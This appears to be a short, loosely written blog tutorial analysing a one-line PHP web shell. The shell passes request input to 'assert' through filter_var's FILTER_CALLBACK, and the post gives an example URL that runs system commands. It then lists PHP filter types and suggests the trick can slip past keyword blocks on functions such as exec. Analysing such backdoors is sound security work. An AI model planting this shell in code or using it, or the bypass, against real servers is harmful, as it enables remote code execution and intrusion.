The Sample
<?php
filter_var($_REQUEST['op'], FILTER_CALLBACK, array('options' => 'assert'));
?>
yes,it seems easy to understand,So just try to learn more from this sample
Analysis
filter_var
From php.net:
filter_var — Filters a variable with a specified filter
Description:
mixed filter_var ( mixed $variable [, int $filter = FILTER_DEFAULT [, mixed $options ]] )
- For $variable,it’s a Value to filter.
- For FILTER_DEFAULT,it’s the ID of the FILTER to apply,let’s see what type do we have?We can see it at the end of this article so that we can continue our study.
- For $options,it used to accepts the options for FILTER which was needed
Sample
For the sample,it use the FILTER_CALLBACK filter,let’s see the use of it:
he is in the ‘Other filters’
it used to call user-defined function to filter data,And the ‘Options’ equal to ‘callable function or method’
Okay,now we get the meaning:
filter_var($_REQUEST['op'], FILTER_CALLBACK, array('options' => 'assert'));
he uses FILTER_CALLBACK to call the function – ‘assert’ to $_REQUEST['op']
Next,make it more obvious:The expression equal to this expression
assert($_REQUEST['op']);
so,we can easy to do like this: url?op=system('whoami') to exec our code.Dangerous!
FILTER TYPE
it were divided to four categoriesValidate filters,Sanitize filters,Other filters and Filter tags.
For validate filters
-
FILTER_VALIDATE_BOOLEAN
Returns TRUE for “1”, “true”, “on” and “yes”. Returns FALSE otherwise.If FILTER_NULL_ON_FAILURE is set, FALSE is returned only for “0”, “false”, “off”, “no”, and “”, and NULL is returned for all non-boolean values.
-
FILTER_VALIDATE_DOMAIN
-
FILTER_VALIDATE_EMAIL
-
FILTER_VALIDATE_FLOAT
-
FILTER_VALIDATE_INT
-
FILTER_VALIDATE_IP
-
FILTER_VALIDATE_MAC
-
FILTER_VALIDATE_REGEXP
-
FILTER_VALIDATE_URL
Obviously to find the relation between them through one example,So i hide the explain of the other
For Sanitize filters
- FILTER_SANITIZE_EMAIL
Remove all characters except letters, digits and !#$%&’*±=?^_`{|}[email protected][]. - FILTER_SANITIZE_ENCODED
- FILTER_SANITIZE_MAGIC_QUOTES
- FILTER_SANITIZE_NUMBER_FLOAT
- FILTER_SANITIZE_NUMBER_INT
- FILTER_SANITIZE_SPECIAL_CHARS
- FILTER_SANITIZE_FULL_SPECIAL_CHARS
- FILTER_SANITIZE_STRING
- FILTER_SANITIZE_STRIPPED
- FILTER_SANITIZE_URL
- FILTER_UNSAFE_RAW
Other filters
- FILTER_CALLBACK
Filter flags
use in other filters to do the Fine-grained work
i will show you a pic about it
What can we get from this story?
- pay attention to
assert,no matter if he occurs like a funciton or not - the use of
filter_var,maybe we can use it to bypass somethings just disable word likeexec - lots of
FILTER TYPEwait for us to dig out somethings